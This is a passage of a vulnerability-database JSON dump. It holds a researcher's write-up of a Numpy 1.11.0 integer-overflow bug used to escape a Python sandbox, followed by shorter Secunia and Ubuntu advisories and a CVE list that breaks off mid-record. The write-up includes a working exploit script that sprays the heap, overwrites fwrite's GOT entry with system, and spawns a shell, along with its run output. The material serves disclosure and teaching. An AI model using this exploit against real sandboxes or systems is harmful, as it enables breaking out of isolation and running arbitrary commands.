bounty adventures. But this post isn\u2019t about that report. All in all, the issues I discovered are not that interesting from a technical perspective. And it turns out the issues were only present because of a regression.\r\n\r\nBut I wasn\u2019t convinced that securing a Python sandbox would be so easy. Without going into too much detail, the sandbox uses a combination of OS-level isolation and a locked-down Python interpreter. The Python environment uses a custom whitelisting/blacklisting scheme to prevent access to unblessed builtins, modules, functions, etc. The OS-based isolation offers some extra protection, but it is antiquated by today\u2019s standards. Breaking out of the locked-down Python interpreter is not a 100% win, but it puts the attacker dangerously close to being able to compromise the entire system.\r\n\r\nSo I returned to the application and prodded some more. No luck. This is indeed a tough cookie. But then I had a thought\u200a\u2014\u200aPython modules are often just thin wrappers of mountainous C codebases. Surely there are gaggles of memory corruption vulns waiting to be found. Exploiting a memory corruption bug would let me break out of the restricted Python environment.\r\n\r\nWhere to begin? I know the set of Python modules which are whitelisted for importation within the sandbox. Perhaps I should run a distributed network of AFL fuzzers? Or a symbolic execution engine? Or maybe I should scan them with a state of the art static analysis tool? Sure, I could have done any of those things. Or I could have just queried the some bug trackers.\r\n\r\n\r\n\r\n\r\n\r\nTurns out I did not have this hindsight when beginning the hunt, but it did not matter much. My intuition led me to discovering an exploitable memory corruption vulnerability in one of the sandboxes\u2019 whitelisted modules via manual code review and testing. The bug is in Numpy, a foundational library for scientific computing\u200a\u2014\u200athe core of many popular packages, including scipy and pandas. To get a rough idea of Numpy\u2019s potential as a source of memory corruption bugs, let\u2019 check out the lines-of-code counts.\r\n\r\n```\r\n$ cloc *\r\n 520 text files.\r\n 516 unique files. \r\n 43 files ignored.\r\nhttp://cloc.sourceforge.net v 1.60 T=2.42 s (196.7 files/s, 193345.0 lines/s)\r\n \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014\r\nLanguage files blank comment code\r\n \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \r\nC 68 36146 70025 170992\r\nPython 311 27718 57961 87081\r\nC/C++ Header 82 1778 2887 7847\r\nCython 1 947 2556 1627\r\nFortran 90 10 52 12 136\r\nFortran 77 3 2 1 83\r\nmake 1 15 19 62\r\n \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \r\nSUM: 476 66658 133461 267828\r\n```\r\n\r\nIn the remainder of this post, I first describe the conditions which lead to the vulnerability. Next, I discuss some quirks of the CPython runtime which exploit developers should be aware of, and then I walk through the actual exploit. Finally, I wrap up with thoughts on quantifying the risk of memory corruption issues in Python applications.\r\n\r\n### The Vulnerability\r\nThe vulnerability which I am going to walk through is an integer overflow bug in Numpy v1.11.0 (and probably older versions). The issue has been fixed since v1.12.0, but there was no security advisory issued.\r\n\r\nThe vulnerability resides in the API for resizing Numpy\u2019s multidimensional array-like objects, ndarray and friends. resize is called with a tuple defining the array\u2019s shape, where each element of the tuple is the size of a dimension.\r\n\r\n```\r\n$ python\r\n>>> import numpy as np\r\n>>> arr = np.ndarray((2, 2), \u2018int32\u2019)\r\n>>> arr.resize((2, 3))\r\n>>> arr\r\narray([[-895628408, 32603, -895628408],\r\n[ 32603, 0, 0]], dtype=int32)\r\n```\r\n\r\nUnder the covers, `resize` actually `realloc`'s a buffer, with the size calculated as the product of each element in the shape tuple and the element size. So in the prior snippet of code, `arr.resize((2, 3))` boils down to C code `realloc(buffer, 2 * 3 * sizeof(int32))`. The next code snippet is the heavily paraphrased implementation of `resize` in C.\r\n\r\n```c\r\nNPY_NO_EXPORT PyObject *\r\nPyArray_Resize(PyArrayObject *self, PyArray_Dims *newshape, int refcheck,\r\n NPY_ORDER order)\r\n{\r\n // npy_intp is `long long`\r\n npy_intp* new_dimensions = newshape->ptr;\r\n npy_intp newsize = 1;\r\n int new_nd = newshape->len;\r\n int k;\r\n // NPY_MAX_INTP is MAX_LONGLONG (0x7fffffffffffffff)\r\n npy_intp largest = NPY_MAX_INTP / PyArray_DESCR(self)->elsize;\r\n for(k = 0; k < new_nd; k++) {\r\n newsize *= new_dimensions[k];\r\n if (newsize <= 0 || newsize > largest) {\r\n return PyErr_NoMemory();\r\n }\r\n }\r\n if (newsize == 0) {\r\n sd = PyArray_DESCR(self)->elsize;\r\n }\r\n else {\r\n sd = newsize*PyArray_DESCR(self)->elsize;\r\n }\r\n /* Reallocate space if needed */\r\n new_data = realloc(PyArray_DATA(self), sd);\r\n if (new_data == NULL) {\r\n PyErr_SetString(PyExc_MemoryError,\r\n \u201ccannot allocate memory for array\u201d);\r\n return NULL;\r\n }\r\n ((PyArrayObject_fields *)self)->data = new_data;\r\n```\r\n\r\nSpot the vulnerability? You can see inside the for-loop (line 13) that each dimension is multiplied to produce the new size. Later on (line 25) the product of the new size and the element size is passed as the size to `realloc` memory which holds the array. There is some validation on the new size prior to `realloc`, but it does not check for integer overflow, meaning that very large dimensions can result in an array which is allocated with insufficient size. **Ultimately, this gives the attacker a powerful exploit primitive: the ability to read or write arbitrary memory by indexing from an array with overflown size.**\r\n\r\nLet\u2019s develop a quick proof of concept that proves the bug exists.\r\n\r\n```\r\n$ cat poc.py\r\nimport numpy as np\r\narr = np.array('A'*0x100)\r\narr.resize(0x1000, 0x100000000000001)\r\nprint \"bytes allocated for entire array: \" + hex(arr.nbytes) \r\nprint \"max # of elemenets for inner array: \" + hex(arr[0].size)\r\nprint \"size of each element in inner array: \" + hex(arr[0].itemsize) \r\narr[0][10000000000]\r\n$ python poc.py\r\nbytes allocated for entire array: 0x100000\r\nmax # of elemenets for inner array: 0x100000000000001\r\nsize of each element in inner array: 0x100\r\n[1] 2517 segmentation fault (core dumped) python poc.py\r\n$ gdb `which python` core\r\n...\r\nProgram terminated with signal SIGSEGV, Segmentation fault.\r\n(gdb) bt\r\n#0 0x00007f20a5b044f0 in PyArray_Scalar (data=0x8174ae95f010, descr=0x7f20a2fb5870, \r\n base=<numpy.ndarray at remote 0x7f20a7870a80>) at numpy/core/src/multiarray/scalarapi.c:651\r\n#1 0x00007f20a5add45c in array_subscript (self=0x7f20a7870a80, op=<optimized out>)\r\n at numpy/core/src/multiarray/mapping.c:1619\r\n#2 0x00000000004ca345 in PyEval_EvalFrameEx () at ../Python/ceval.c:1539\u2026\r\n(gdb) x/i $pc\r\n=> 0x7f20a5b044f0 <PyArray_Scalar+480>: cmpb $0x0,(%rcx)\r\n(gdb) x/g $rcx\r\n0x8174ae95f10f: Cannot access memory at address 0x8174ae95f10f\r\n```\r\n\r\n### Quirks of the CPython runtime\r\nBefore we walk through developing the exploit, I would like to discuss some ways in which the CPython runtime eases exploitation, but also ways in which it can frustrate the exploit developer. Feel free to skip this section if you want to dive straight into the exploit.\r\n\r\n#### Leaking memory addresses\r\nTypically one of the first hurdles exploits must deal with is to defeat address-space layout randomization (ASLR). Fortunately for attackers, Python makes this easy. The builtin `id` function returns the memory address of an object, or more precisely the address of the PyObject structure which encapsulates the object.\r\n\r\n```\r\n$ gdb -q \u2014 arg /usr/bin/python2.7\r\n (gdb) run -i\r\n \u2026\r\n >>> a = \u2018A\u2019*0x100\r\n >>> b = \u2018B\u2019*0x100000\r\n >>> import numpy as np\r\n >>> c = np.ndarray((10, 10))\r\n >>> hex(id(a))\r\n \u20180x7ffff7f65848\u2019\r\n >>> hex(id(b))\r\n \u20180xa52cd0\u2019\r\n >>> hex(id(c))\r\n \u20180x7ffff7e777b0\u2019\r\n```\r\n\r\nIn real-world applications, developers should make sure not to expose `id(object)` to users. In a sandboxed, environment there is not much you could do about this behavior, except perhaps blacklisting `id` or re-implementing `id`to return a hash.\r\n\r\n#### Understand memory allocation behavior\r\nUnderstanding your allocator is critical for writing exploits. Python has different allocation strategies based on object type and size. Let\u2019s check out where our big string `0xa52cd0`, little string `0x7ffff7f65848`, and numpy array `0x7ffff7e777b0` landed.\r\n\r\n```\r\n$ cat /proc/`pgrep python`/maps \r\n00400000\u2013006ea000 r-xp 00000000 08:01 2712 /usr/bin/python2.7\r\n008e9000\u2013008eb000 r \u2014 p 002e9000 08:01 2712 /usr/bin/python2.7\r\n008eb000\u201300962000 rw-p 002eb000 08:01 2712 /usr/bin/python2.7\r\n00962000\u201300fa8000 rw-p 00000000 00:00 0 [heap] # big string\r\n...\r\n7ffff7e1d000\u20137ffff7edd000 rw-p 00000000 00:00 0 # numpy array\r\n...\r\n7ffff7f0e000\u20137ffff7fd3000 rw-p 00000000 00:00 0 # small string\r\n```\r\n\r\nBig string is in the regular heap. Small string and numpy array are in separate mmap\u2019d regions.\r\n\r\n#### Python object structure\r\nLeaking and corrupting Python object metadata can be quite powerful, so it\u2019s useful to understand how Python objects are represented. Under the covers, Python objects all derive from PyObject, a structure which contains a reference count and a descriptor of the object\u2019s actual type. Of note, the type descriptor contains many fields, including function pointers which could be useful to read or overwrite.\r\n\r\nLet\u2019s inspect the small string we created in the section just prior.\r\n\r\n```\r\n(gdb) print *(PyObject *)0x7ffff7f65848\r\n$2 = {ob_refcnt = 1, ob_type = 0x9070a0 <PyString_Type>}\r\n(gdb) print *(PyStringObject *)0x7ffff7f65848\r\n$3 = {ob_refcnt = 1, ob_type = 0x9070a0 <PyString_Type>, ob_size = 256, ob_shash = -1, ob_sstate = 0, ob_sval = \u201cA\u201d}\r\n(gdb) x/s ((PyStringObject *)0x7ffff7f65848)->ob_sval\r\n0x7ffff7f6586c: \u2018A\u2019 <repeats 200 times>...\r\n(gdb) ptype PyString_Type \r\ntype = struct _typeobject {\r\n Py_ssize_t ob_refcnt;\r\n struct _typeobject *ob_type;\r\n Py_ssize_t ob_size;\r\n const char *tp_name;\r\n Py_ssize_t tp_basicsize;\r\n Py_ssize_t tp_itemsize;\r\n destructor tp_dealloc;\r\n printfunc tp_print;\r\n getattrfunc tp_getattr;\r\n setattrfunc tp_setattr;\r\n cmpfunc tp_compare;\r\n reprfunc tp_repr;\r\n PyNumberMethods *tp_as_number;\r\n PySequenceMethods *tp_as_sequence;\r\n PyMappingMethods *tp_as_mapping;\r\n hashfunc tp_hash;\r\n ternaryfunc tp_call;\r\n reprfunc tp_str;\r\n getattrofunc tp_getattro;\r\n setattrofunc tp_setattro;\r\n PyBufferProcs *tp_as_buffer;\r\n long tp_flags;\r\n const char *tp_doc;\r\n traverseproc tp_traverse;\r\n inquiry tp_clear;\r\n richcmpfunc tp_richcompare;\r\n Py_ssize_t tp_weaklistoffset;\r\n getiterfunc tp_iter;\r\n iternextfunc tp_iternext;\r\n struct PyMethodDef *tp_methods;\r\n struct PyMemberDef *tp_members;\r\n struct PyGetSetDef *tp_getset;\r\n struct _typeobject *tp_base;\r\n PyObject *tp_dict;\r\n descrgetfunc tp_descr_get;\r\n descrsetfunc tp_descr_set;\r\n Py_ssize_t tp_dictoffset;\r\n initproc tp_init;\r\n allocfunc tp_alloc;\r\n newfunc tp_new;\r\n freefunc tp_free;\r\n inquiry tp_is_gc;\r\n PyObject *tp_bases;\r\n PyObject *tp_mro;\r\n PyObject *tp_cache;\r\n PyObject *tp_subclasses;\r\n PyObject *tp_weaklist;\r\n destructor tp_del;\r\n unsigned int tp_version_tag;\r\n}\r\n```\r\n\r\n#### Shellcode like it\u2019s 1999\r\nThe ctypes library serves as a bridge between Python and C code. It provides C compatible data types, and allows calling functions in DLLs or shared libraries. Many modules which have C bindings or require calling into shared libraries require importing ctypes.\r\n\r\nI noticed that importing ctypes results in the mapping of a 4K-sized memory region set with read/write/execute permissions. If it wasn\u2019t already obvious, this means that attackers do not even need to write a ROP chain. Exploiting a bug is as simple as pointing the instruction pointer at your shellcode, granted you have already located the RWX region.\r\n\r\nTest it for yourself!\r\n\r\n```\r\n$ cat foo.py\r\nimport ctypes\r\nwhile True:\r\n pass\r\n$ python foo.py\r\n^Z\r\n[2] + 30567 suspended python foo.py\r\n$ grep rwx /proc/30567/maps\r\n7fcb806d5000\u20137fcb806d6000 rwxp 00000000 00:00 0\r\n```\r\n\r\nInvestigating further, I discovered that [libffi\u2019s closure API](http://www.chiark.greenend.org.uk/doc/libffi-dev/html/The-Closure-API.html) is [responsible](https://github.com/libffi/libffi/blob/master/src/closures.c#L762) for `mmap`ing the RWX region. However, the region cannot be allocated RWX on certain platforms, such as systems with selinux enforced or PAX mprotect enabled, and there is code which works around this limitation.\r\n\r\nI did not spend much time trying to reliably locate the RWX mapping, but in theory it should be possible if you have an arbitrary-read exploit primitive. While ASLR is applied to libraries, the dynamic linker maps the regions of the library in a predictable order. A library\u2019s regions include its globals which are private to the library and the code itself. Libffi stores a reference to the RWX region as a global. If for example you find a pointer to a libffi function on the heap, then you could precalculate the address of the RWX-region pointer as an offset from the address of the libffi function pointer. The offset would need to be adjusted for each library version.\r\n\r\n#### De facto exploit mitigations\r\n\r\nI tested out security-related compiler flags for the Python2.7 binary on Ubuntu 14.04.5 and 16.04.1. There are a couple of weaknesses which are quite useful for the attacker:\r\n\r\n* Partial RELRO: The executable\u2019s [GOT section](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html), which contains pointers to library functions dynamically linked into the binary, is writable. Exploits could replace the address of `printf()` with `system()` for example.\r\n* No PIE: The binary is not a Position-Independent Executable, meaning that while the kernel applies ASLR to most memory mappings, the contents of the binary itself are mapped to static addresses. Since the GOT section is part of the binary, no PIE makes it easier for attackers to locate and write to the GOT.\r\n\r\n#### Road blocks\r\nWhile CPython is an environment full of tools for the exploit developer, there are forces which broke many of my exploit attempts and were difficult to debug.\r\n\r\n* The garbage collector, type system, and possibly other unknown forces will break your exploit if you aren\u2019t careful about clobbering object metadata.\r\n* `id()` can be unreliable. For reasons I could not determine, Python appears sometimes to pass a copy of the object while the the original object is used\u00a0.\r\n* The region where objects are allocated is somewhat unpredictable. For reasons I could not determine, certain coding patterns led to buffers being allocated in the `brk` heap, while other patterns led to allocation in a python-specific `mmap`\u2018d heap.\r\n\r\n### The exploit\r\nSoon after discovering the numpy integer overflow, I submitted a report to the bug bounty with a proof of concept that hijacked the instruction pointer, but did not inject any code. When I initially submitted I did not realize that the PoC was actually pretty unreliable, and I wasn\u2019t able to test it properly against their servers because validating hijack of the instruction pointer requires access to core dumps or a debugger. The vendor acknowledged the issue\u2019s legitimacy, but they gave a less generous reward than for my first report.\r\n\r\nFair enough!\r\nI\u2019m not really an exploit developer, but I challenged myself to do better. After much trial and error, I eventually wrote an exploit which appears to be reliable. Unfortunately I was never able to test it in the vendor\u2019s sandbox because they updated numpy before I could finish, but it does work when testing locally in a Python interpreter.\r\n\r\nAt a high level, the exploit gains an arbitrary read/write exploit primitive by overflowing the size of a numpy array. The primitive is used to write the address of `system` to `fwrite`'s GOT/PLT entry. Finally, Python\u2019s builtin `print` calls `fwrite` under the covers, so now you can call `print '/bin/sh'` to get a shell, or replace /bin/sh with any command.\r\n\r\nThere is a bit more to it than the high-level explanation, so check out the exploit in full below. I recommend to begin reading from the bottom-up, including comments. If you are using a different version of Python, adjust the GOT locations for `fwrite` and `system` before you run it.\r\n\r\n```python\r\nimport numpy as np\r\n\r\n# addr_to_str is a quick and dirty replacement for struct.pack(), needed\r\n# for sandbox environments that block the struct module.\r\ndef addr_to_str(addr):\r\n addr_str = \"%016x\" % (addr)\r\n ret = str()\r\n for i in range(16, 0, -2):\r\n ret = ret + addr_str[i-2:i].decode('hex')\r\n return ret\r\n\r\n# read_address and write_address use overflown numpy arrays to search for\r\n# bytearray objects we've sprayed on the heap, represented as a PyByteArray\r\n# structure:\r\n# \r\n# struct PyByteArray {\r\n# Py_ssize_t ob_refcnt;\r\n# struct _typeobject *ob_type;\r\n# Py_ssize_t ob_size;\r\n# int ob_exports;\r\n# Py_ssize_t ob_alloc;\r\n# char *ob_bytes;\r\n# };\r\n# \r\n# Once located, the pointer to actual data `ob_bytes` is overwritten with the\r\n# address that we want to read or write. We then cycle through the list of byte\r\n# arrays until we find the one that has been corrupted. This bytearray is used\r\n# to read or write the desired location. Finally, we clean up by setting\r\n# `ob_bytes` back to its original value.\r\ndef find_address(addr, data=None):\r\n i = 0\r\n j = -1\r\n k = 0\r\n\r\n if data:\r\n size = 0x102\r\n else:\r\n size = 0x103\r\n for k, arr in enumerate(arrays):\r\n i = 0\r\n for i in range(0x2000): # 0x2000 is a value that happens to work\r\n # Here we search for the signature of a PyByteArray structure\r\n j = arr[0][i].find(addr_to_str(0x1)) # ob_refcnt\r\n if (j < 0 or\r\n arr[0][i][j+0x10:j+0x18] != addr_to_str(size) or # ob_size\r\n arr[0][i][j+0x20:j+0x28] != addr_to_str(size+1)): # ob_alloc\r\n continue\r\n idx_bytes = j+0x28 # ob_bytes\r\n\r\n # Save an unclobbered copy of the bytearray metadata\r\n saved_metadata = arrays[k][0][i]\r\n\r\n # Overwrite the ob_bytes pointer with the provded address\r\n addr_string = addr_to_str(addr)\r\n new_metadata = (saved_metadata[0:idx_bytes] +\r\n addr_string +\r\n saved_metadata[idx_bytes+8:])\r\n arrays[k][0][i] = new_metadata\r\n\r\n ret = None\r\n for bytearray_ in bytearrays:\r\n try:\r\n # We differentiate the signature by size for each\r\n # find_address invocation because we don't want to\r\n # accidentally clobber the wrong bytearray structure.\r\n # We know we've hit the structure we're looking for if\r\n # the size matches and it contents do not equal 'XXXXXXXX'\r\n if len(bytearray_) == size and bytearray_[0:8] != 'XXXXXXXX':\r\n if data:\r\n bytearray_[0:8] = data # write memory\r\n else:\r\n ret = bytearray_[0:8] # read memory\r\n\r\n # restore the original PyByteArray->ob_bytes\r\n arrays[k][0][i] = saved_metadata\r\n return ret\r\n except:\r\n pass\r\n raise Exception(\"Failed to find address %x\" % addr)\r\n\r\ndef read_address(addr):\r\n return find_address(addr)\r\n\r\ndef write_address(addr, data):\r\n find_address(addr, data)\r\n\r\n\r\n# The address of GOT/PLT entries for system() and fwrite() are hardcoded. These\r\n# addresses are static for a given Python binary when compiled without -fPIE.\r\n# You can obtain them yourself with the following command:\r\n# `readelf -a /path/to/python/ | grep -E '(system|fwrite)'\r\nSYSTEM = 0x8eb278\r\nFWRITE = 0x8eb810\r\n\r\n# Spray the heap with some bytearrays and overflown numpy arrays.\r\narrays = []\r\nbytearrays = []\r\nfor i in range(100):\r\n arrays.append(np.array('A'*0x100))\r\n arrays[-1].resize(0x1000, 0x100000000000001)\r\n bytearrays.append(bytearray('X'*0x102))\r\n bytearrays.append(bytearray('X'*0x103))\r\n\r\n# Read the address of system() and write it to fwrite()'s PLT entry. \r\ndata = read_address(SYSTEM)\r\nwrite_address(FWRITE, data)\r\n\r\n# print() will now call system() with whatever string you pass\r\nprint \"PS1='[HACKED] $ ' /bin/sh\"\r\n```\r\n\r\nRunning the exploit gives you a \u201chacked\u201d shell.\r\n\r\n```\r\n$ virtualenv .venv\r\nRunning virtualenv with interpreter /usr/bin/python2\r\nNew python executable in /home/gabe/Downloads/numpy-exploit/.venv/bin/python2\r\nAlso creating executable in /home/gabe/Downloads/numpy-exploit/.venv/bin/python\r\nInstalling setuptools, pkg_resources, pip, wheel...done.\r\n$ source .venv/bin/activate\r\n(.venv) $ pip install numpy==1.11.0\r\nCollecting numpy==1.11.0\r\n Using cached numpy-1.11.0-cp27-cp27mu-manylinux1_x86_64.whl\r\nInstalling collected packages: numpy\r\nSuccessfully installed numpy-1.11.0\r\n(.venv) $ python --version\r\nPython 2.7.12\r\n(.venv) $ python numpy_exploit.py \r\n[HACKED] $ \r\n```\r\n\r\n### Quantifying the risk\r\nIt is well known that much of Python\u2019s core and many third-party modules are thin wrappers of C code. Perhaps less recognized is the fact that memory corruption bugs are reported in popular Python modules all the time without so much as a CVE, a security advisory, or even a mention of security fixes in release notes.\r\n\r\nSo yes, there are a lot of memory corruption bugs in Python modules. Surely not all of them are exploitable, but you have to start somewhere. To reason about the risk posed by memory corruption bugs, I find it helpful to frame the conversation in terms of two discrete use-cases: regular Python applications, and sandboxing untrusted code.\r\n\r\n#### Regular applications\r\nThe types of applications we\u2019re concerned with are those having a meaningful attack surface. Think web applications and other network-facing services, client applications which process untrusted content, privileged system services, etc. Many of these applications import Python modules built against mountains of C code from projects which do not treat their memory corruption bugs as security issues. The pure thought of this may keep some security professionals up at night, but in reality the risk is typically downplayed or ignored. I suspect there are a few reasons:\r\n\r\n* The difficulty to remotely identify and exploit memory corruption issues is quite high, especially for closed-source and remote applications.\r\n* The likelihood that an application exposes a path for untrusted input to reach a vulnerable function is probably quite low.\r\n* Awareness is low because memory corruption bugs in Python modules are not typically tracked as security issues.\r\n\r\nSo fair enough, the likelihood of getting compromised due to a buffer overflow in some random Python module is probably quite low. But then again, memory corruption flaws can be extremely damaging when they do happen. Sometimes it doesn\u2019t even take anyone to explicitly exploit them to cause harm (re: cloudbleed). To make matters worse, it\u2019s nigh impossible to keep libraries patched when library maintainers do not think about memory corruption issues in terms of security.\r\n\r\nIf you develop a major Python application, I suggest you at least take an inventory of the Python modules being used. Try to find out how much C code your modules are reliant upon, and analyze the potential for exposure of native code to the edge of your application.\r\n\r\n#### Sandboxing\r\n\r\nThere are a number of services out there that allow users to run untrusted Python code within a sandbox. OS-level sandboxing features, such as linux namespaces and seccomp, have only become popular relatively recently in the form of Docker, LXC, etc. Weaker sandboxing techniques can unfortunately still be found in use today\u200a\u2014\u200aat the OS layer in the form of chroot jails, or worse, sandboxing can be done entirely in Python (see [pypy-sandbox](http://doc.pypy.org/en/latest/sandbox.html) and [pysandbox](https://github.com/haypo/pysandbox)).\r\n\r\nMemory corruption bugs completely break sandboxing which is not enforced by the OS. The ability to execute a subset of Python code makes exploitation far more feasible than in regular applications. Even pypy-sandbox, which claims to be secure because of its two-process model which virtualizes system calls, can be broken by a buffer overflow.\r\n\r\nIf you want to run untrusted code of any kind, invest the effort in building a secure OS and network architecture to sandbox it.", "published": "2017-03-29T00:00:00", "type": "seebug", "title": "Escaping a Python sandbox with a memory corruption bug", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92847", "id": "SSV:92847", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", 